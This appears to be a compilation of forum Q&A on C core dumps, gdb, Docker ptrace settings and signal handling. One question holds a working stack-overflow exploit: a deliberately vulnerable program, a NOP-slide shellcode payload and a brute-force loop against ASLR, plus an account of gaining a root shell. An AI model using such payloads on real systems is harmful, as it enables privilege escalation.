When I run programs with segfaults I get an error message Segmentation fault: 11. For some reason, I'm not getting the (core dumped) message. I tried running the shell command ulimit -c unlimited, but I still get the same error and it doesn't say core dumped. I'm new to GDB so I tried it with a simple program:
/* coredump.c */
#include <stdio.h>

int main(void) {
    int *point = NULL;
    *point = 0;
    return 0;
}
But when I compile using:
gcc coredump.c -g -o coredump
And run it, it still just says Segmentation fault: 11.
Is it still creating a core dump somewhere I don't know about? I want to be able to use gdb coredump core.
Look at this link:
How to generate a core dump in Linux when a process gets a segmentation fault?
Options include:
ulimit -c unlimited (default = 0: no core files generated)
the directory for the dump must be writable. By default this is the current directory of the process, but that may be changed by setting /proc/sys/kernel/core_pattern.
in some conditions, the kernel value in /proc/sys/fs/suid_dumpable may prevent the core to be generated.
"man core" for other options
find / -name core -print 2> /dev/null to search your filesystem for core files
I presume you're running Linux, and I presume you're executing the .exe in a directory where you have write permissions.
So my top two guesses would be 1) "ulimit -c unlimited" isn't getting set, or is being overridden, or 2) the core files are being generated, but going "somewhere else".
The above suggestions should help. Please post back what you find!
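One quick way to test the first guess is to print, from inside a process, the core-size limit it actually inherited. Here is a minimal diagnostic sketch, assuming a POSIX system with getrlimit (checklimit.c is just an illustrative name):

/* checklimit.c - print the core-file size limit this process inherited */
#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0) {
        perror("getrlimit");
        return 1;
    }
    /* rlim_cur is the soft limit the kernel enforces; 0 means no core file */
    if (rl.rlim_cur == 0)
        printf("soft core limit is 0: no core file will be written\n");
    else if (rl.rlim_cur == RLIM_INFINITY)
        printf("soft core limit is unlimited\n");
    else
        printf("soft core limit is %llu bytes\n", (unsigned long long)rl.rlim_cur);
    return 0;
}

If this prints 0 when run from the same shell where you set ulimit -c unlimited, the limit is not being inherited (guess 1); if it prints unlimited and you still see no core file next to the executable, look into guess 2.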
If you're running the program that crashes from the shell, then you should follow the guidelines in Apple's Tech Note TN2124, which I found out about in the answer to SO2207233.
There are a few key points:
You need to set ulimit -c unlimited in bash (same effect, different command in tcsh).
You need to set the permissions on the /cores directory so that you can create files in it. The default permissions are 1775; you need 1777. The 1 indicates the sticky bit is set.
The core dumps are then created in /cores suffixed with a PID (/cores/core.5312, for example).
If you want programs launched graphically to dump core when they crash, then you need to create /etc/launchd.conf if it does not already exist, and add a line limit core unlimited to the file. Again, see the information in the Tech Note for more details.
Watch it; core dumps are huge! Consider this not very complicated or big program:
#include <stdio.h>

int main(void)
{
    int *i = 0;
    int j = 0;
    printf("i = %d, j = %d, i / j = %d\n", *i, j, *i / j);
    return 0;
}
The core dump from this is nearly 360 MB.
Using gcc, if you add the flag:
gcc -g
you give gdb the debugging information it needs to make sense of the core dump. Note that the -dH flag sometimes suggested alongside it is a GCC developer option: it makes the compiler itself dump core when it hits an internal error, not your program.
Sometimes core files are not stored in the current directory and may follow a different naming rule.
sysctl -a | grep kern.core
may give hints to where your core files are stored
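If you prefer to query this from code on macOS/BSD, the same information should be readable through sysctlbyname; a rough sketch, assuming the kern.corefile sysctl is available (its value is typically a template like /cores/core.%P, where %P expands to the PID):

/* corepath.c - read the kernel's core file name template (macOS/BSD) */
#include <stdio.h>
#include <sys/sysctl.h>

int main(void)
{
    char pattern[256];
    size_t len = sizeof(pattern);
    /* kern.corefile holds the template used to name core files */
    if (sysctlbyname("kern.corefile", pattern, &len, NULL, 0) != 0) {
        perror("sysctlbyname");
        return 1;
    }
    printf("core files are written as: %s\n", pattern);
    return 0;
}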
What have I done wrong (or not done) that gdb is not working properly for me?
root@6be3d60ab7c6:/# cat minimal.c
int main()
{
    int i = 1337;
    return 0;
}
root@6be3d60ab7c6:/# gcc -g minimal.c -o minimal
root@6be3d60ab7c6:/# gdb minimal
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
.
.
.
Reading symbols from minimal...done.
(gdb) break main
Breakpoint 1 at 0x4004f1: file minimal.c, line 3.
(gdb) run
Starting program: /minimal
warning: Error disabling address space randomization: Operation not permitted
During startup program exited normally.
(gdb)
(gdb) print i
No symbol "i" in current context.
If you're using Docker, you probably need the --security-opt seccomp=unconfined option (as well as enabling ptrace):
docker run --cap-add=SYS_PTRACE --security-opt seccomp=unconfined
For whatever reason, your user account doesn't have permission to disable the kernel's address space layout randomisation for this process. By default, gdb turns this off because it makes some sorts of debugging easier (in particular, it means the address of stack objects will be the same each time you run your program). Read more here.
You can work around this problem by disabling this feature of gdb with set disable-randomization off.
As for getting your user the permission needed to disable ASLR, it probably boils down to having write permission to /proc/sys/kernel/randomize_va_space. Read more here.
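For the curious, what gdb does on Linux when it disables randomization is essentially a personality(2) call with ADDR_NO_RANDOMIZE before exec'ing your program. Here is a minimal sketch of a wrapper doing the same thing (norandom.c is a hypothetical name; the call fails with EPERM under Docker's default seccomp profile, which is exactly the warning above):

/* norandom.c - exec a program with ASLR disabled, roughly what gdb does */
#include <stdio.h>
#include <sys/personality.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s program [args...]\n", argv[0]);
        return 1;
    }
    int persona = personality(0xffffffff);            /* query the current persona */
    if (persona == -1 ||
        personality(persona | ADDR_NO_RANDOMIZE) == -1) {
        perror("personality");                        /* same failure gdb warns about */
    }
    execvp(argv[1], &argv[1]);
    perror("execvp");
    return 1;
}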
Building on wisbucky's answer (thank you!), here are the same settings for Docker compose:
security_opt:
- seccomp:unconfined
cap_add:
- SYS_PTRACE
The security option seccomp:unconfined fixed the address space randomization warnings.
The capability SYS_PTRACE didn't seem to have a noticeable effect even though the Docker documentation states that SYS_PTRACE is a capability that is "not granted by default". Perhaps I don't know what to look for.
I've made a program with a segmentation fault and I want to get the core dump file, but it seems that the file is not in the current directory. I've read and followed these instructions:
core dumped - but core file is not in current directory?
but I'm still unable to get the core file.
I've tried this:
ulimit -c unlimited
ulimit -S -c unlimited
I've also edited /etc/security/limits.conf the line:
* soft core 10000
(it was 0 the default value)
My system runs apport, so I've also searched /var/crash, but the file that should have been generated wasn't there.
More useful information:
$ cat /proc/sys/kernel/core_pattern
|/usr/share/apport/apport %p %s %c
So what did I miss? I still don't get a core file after the segmentation fault, or if one is generated, I don't know where it goes.
I am invoking make from my C program, which in turn executes another program. I am redirecting both standard output and standard error to a file. However, when the program run by make terminates due to a segmentation fault, a core dump is generated and a message about it is printed to the console (standard output) of the main program that invokes make.
How can I get around this and not have the core dump show on the console?
The following is my code to invoke make :
int pid = fork();
if (pid == 0) {
    dup2(make_logs, 1);   /* child's stdout goes to the log file */
    dup2(make_logs, 2);   /* and so does its stderr */
    close(make_logs);
    execvp(args[0], args);
}
Where make_logs is the file opened using 'open'
Thanks
I would try to fix the core dump rather than suppress the message. The message about the segmentation fault is generated by the shell (which detects the exit status of the child and recognizes a core dump situation), so you can suppress it by writing your own program that handles the fork() and wait() rather than having the shell do the work.
To suppress the core dump itself, just use limit coredumpsize 0 (that is csh/tcsh syntax; the bash equivalent is ulimit -c 0).
Sample of suppression (sloppy code; you should really be checking for errors):
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    int pid;
    if ((pid = fork()) > 0) wait(0);
    else if (pid == 0) {
        execl("program-that-cdumps", "program-that-cdumps", (char *)0);
        perror("failed in execl");
    } else perror("failed in fork");
    return 0;
}
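If you take over the fork() and wait() yourself, the parent can also inspect the child's wait status and decide where (or whether) to report the crash. A small sketch using WIFSIGNALED and WCOREDUMP (the latter is not in POSIX, but exists on Linux and the BSDs), again with program-that-cdumps standing in for the real command:

#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(void)
{
    pid_t pid = fork();
    if (pid == 0) {
        execl("program-that-cdumps", "program-that-cdumps", (char *)0);
        perror("failed in execl");
        _exit(127);
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) {
        perror("waitpid");
        return 1;
    }
    if (WIFSIGNALED(status)) {
        /* report to stderr (or a log file) instead of letting the shell print it */
        fprintf(stderr, "child killed by signal %d%s\n",
                WTERMSIG(status),
                WCOREDUMP(status) ? " (core dumped)" : "");
    }
    return 0;
}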
Read core(5) and signal(7) man pages.
Compile all your programs with gcc -Wall -g. Then use
file core
to understand which binary dumped the core. It probably says something like core dump from foo to tell you that program foo dumped the core. Then, start a post mortem debugger on it:
gdb foo core
and use the common gdb commands (notably bt to backtrace, p to print, etc...).
The message dumped core is given by some shell (or perhaps by make when it is acting like a shell). I don't think that the core file is output to stdout (it is a big binary file).
If you wish to avoid the core (which IMHO is a bad idea, a core dump is a good symptom of something wrong), you could call the setrlimit(2) syscall with RLIMIT_CORE and a 0 limit after your fork and before the execvp. I believe you should not do that (or at least have some way of configuring that setrlimit is not called: sometimes you really need the core dump to debug the problem).
You should fix the problem which gives the core dump, not try to avoid the dumped core message!
If you run make on a user provided Makefile so that the core dump is from a user program, you really want to keep the user informed that a core did happen, so you should keep the core dumped message.
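If you do decide to go the setrlimit route, here is a minimal sketch of a wrapper (a hypothetical nocorespawn.c, not the poster's code) that forks, drops RLIMIT_CORE to zero in the child, and then execs the command:

/* nocorespawn.c - run a command with core dumps disabled for it */
#include <stdio.h>
#include <sys/resource.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s command [args...]\n", argv[0]);
        return 1;
    }
    pid_t pid = fork();
    if (pid == 0) {
        struct rlimit rl = { 0, 0 };      /* soft and hard core limit of 0 */
        setrlimit(RLIMIT_CORE, &rl);      /* the command will not write a core file */
        execvp(argv[1], &argv[1]);
        perror("execvp");
        _exit(127);
    }
    waitpid(pid, NULL, 0);
    return 0;
}

Note that the shell (or make) will still report the segmentation fault itself; only the (core dumped) part of the message and the core file go away.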
I just read about Address Space Layout Randomization and I tried a very simple script to try to brute force it. Here is the program I used to test a few things.
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
    char buf[8];
    printf("&buf = %p\n", buf);
    if (argc > 1 && strcpy(buf, argv[1]));
    return 0;
}
I compiled it with this command:
gcc -g -fno-stack-protector -o vul vul.c
I made sure ASLR was enabled:
$ sysctl kernel.randomize_va_space
kernel.randomize_va_space = 2
Then, I came up with this simple script:
str=`perl -e 'print "\x40\xfa\xbb\xbf"x10 \
. "\x90"x65536 \
. "\x31\xc0\x40\x89\xc3\xcd\x80"'`
while [ $? -ne 1 ]; do
./vul $str
done
The format is
return address many times | 64KB NOP slide | shellcode that runs exit(1)
After running this script for a few seconds it exits with error code 1 as I wanted it to. I also tried other shellcodes that call execv("/bin/sh", ...) and I was successful as well.
I find it strange that it's possible to create such a long NOP slide even after the return address. I thought ASLR was more effective, did I miss something? Is it because the address space is too small?
EDIT: I did some additional research and here is what I found:
I asked a friend to run this code using -m32 -z execstack on his 64-bit computer and, after changing the return address a bit, he had the same results.
Even though I did not use -z execstack, I managed to execute the shellcode. I made sure of that by using different shellcodes which all did what they were supposed to do (even the well-known scenario chown root ./vul, chmod +s ./vul, shellcode that runs setreuid(0, 0) then execv("/bin/sh", ...), and finally whoami that returns 'root' in the spawned shell).
That is quite strange, since execstack -q ./vul tells me the executable stack flag bit is not set. Does anyone have an idea why?
First of all, I'm a bit surprised that you do not need to pass the option -z execstack to the compiler to get the shellcode to execute the exit(1).
Moreover, I guess you are on a 32-bit machine, as you did not pass the option -m32 to gcc to get 32-bit code.
Finally, I did run your program without success (I waited way more than a few seconds).
So I'm a bit doubtful about your conclusion (unless you are running a very peculiar Linux system, or got lucky).
Anyway, there are two main things that you have not mentioned:
Having a bug that offers an unlimited exploitation window is quite rare.
Most modern systems run on amd64 (64-bit) processors, which drastically lowers the probability of hitting the NOP zone.
You may take a look at the section "ASLR Effectiveness" on the ASLR's Wikipedia page.
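To put rough numbers on that second point (the exact entropy depends on the kernel and architecture, so treat this as an estimate): if a 32-bit kernel randomizes the stack base over roughly 8 MiB, a 64 KiB NOP slide is hit by a single guess about 64 KiB / 8 MiB = 1 time in 128, so a loop like the one above can succeed within seconds. On a 64-bit kernel the stack is randomized over a range on the order of gigabytes, so the same slide gives odds worse by several orders of magnitude.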
How can I dump core when my program receives the SIGSEGV signal? (The server that runs my program has very limited permissions, and therefore core dumps are disabled by default.)
I have written the following using gcore, but I would like to use C functions instead. Can I somehow catch the core and write it to a folder somewhere?
#include <signal.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

void segfaulthandler(int parameter)
{
    char gcore[50];
    /* shell out to gcore to write a core file for this process */
    sprintf(gcore, "gcore -s -c \"core\" %u", (unsigned)getpid());
    system(gcore);
    exit(1);
}

int main(void)
{
    signal(SIGSEGV, segfaulthandler);
}
Unless there's a hard limit preventing you, you could use setrlimit(RLIMIT_CORE, ...) to increase the soft limit and enable core dumps - this corresponds to running ulimit -c in the shell.
On linux, you typically can do:
$ ulimit -c unlimited
The resulting core file will be written in the current working directory of the process when the signal is received.
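Here is a minimal sketch of that setrlimit approach, raising the soft limit up to whatever the hard limit allows at program start and then crashing on purpose so you can check that a core file actually appears (enablecore.c is just an illustrative name):

/* enablecore.c - raise the core limit, then crash to verify a core is written */
#include <stdio.h>
#include <sys/resource.h>

int main(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) == 0) {
        rl.rlim_cur = rl.rlim_max;        /* raise the soft limit to the hard limit */
        if (setrlimit(RLIMIT_CORE, &rl) != 0)
            perror("setrlimit");
    }
    int *p = NULL;
    *p = 0;                               /* deliberate SIGSEGV: a core file should appear */
    return 0;
}

If the hard limit itself is 0 on that restricted server, this will not help, and you are back to a handler-based workaround like the gcore one above.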